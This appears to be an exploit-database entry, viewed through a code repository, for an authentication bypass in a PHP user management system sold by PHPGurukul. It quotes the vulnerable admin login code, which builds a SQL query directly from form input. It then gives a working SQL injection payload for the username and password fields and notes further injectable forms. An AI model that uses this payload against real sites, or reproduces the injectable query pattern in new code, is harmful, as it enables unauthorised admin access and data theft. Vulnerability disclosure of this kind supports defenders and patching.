cae82bb178
8 changes to exploits/shellcodes User Management System 2.0 - Persistent Cross-Site Scripting User Management System 2.0 - Authentication Bypass Complaint Management System 4.2 - Persistent Cross-Site Scripting Complaint Management System 4.2 - Authentication Bypass Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User) Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit) Sky File 2.1.0 iOS - Directory Traversal
49 lines
No EOL
1.3 KiB
Text
49 lines
No EOL
1.3 KiB
Text
# Exploit Title: User Management System 2.0 - Authentication Bypass
|
|
# Author: Besim ALTINOK
|
|
# Vendor Homepage: https://phpgurukul.com/
|
|
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
|
|
# Version: v2.0
|
|
# Tested on: Xampp
|
|
# Credit: İsmail BOZKURT
|
|
|
|
|
|
------ Details:
|
|
|
|
1- Vulnerable code is here (admin login: /admin/index.php):
|
|
|
|
<?php
|
|
session_start();
|
|
include("dbconnection.php");
|
|
if(isset($_POST['login']))
|
|
{
|
|
$adminusername=$_POST['username'];
|
|
$pass=md5($_POST['password']);
|
|
$ret=mysqli_query($con,"SELECT * FROM admin WHERE
|
|
username='$adminusername' and password='$pass'");
|
|
$num=mysqli_fetch_array($ret);
|
|
if($num>0)
|
|
{
|
|
$extra="manage-users.php";
|
|
$_SESSION['login']=$_POST['username'];
|
|
$_SESSION['id']=$num['id'];
|
|
echo "<script>window.location.href='".$extra."'</script>";
|
|
exit();
|
|
}
|
|
else
|
|
{
|
|
$_SESSION['action1']="*Invalid username or password";
|
|
$extra="index.php";
|
|
echo "<script>window.location.href='".$extra."'</script>";
|
|
exit();
|
|
}
|
|
}
|
|
|
|
2- We can bypass authentication with SQLi:
|
|
|
|
Bypass code (user and admin login panel):
|
|
|
|
Username: pentester' or'1'=1#
|
|
Password : pentester' or'1'=1#
|
|
|
|
Finally: There is a lot of SQLi input in this project. Like, login,
|
|
registration, forgot password ... |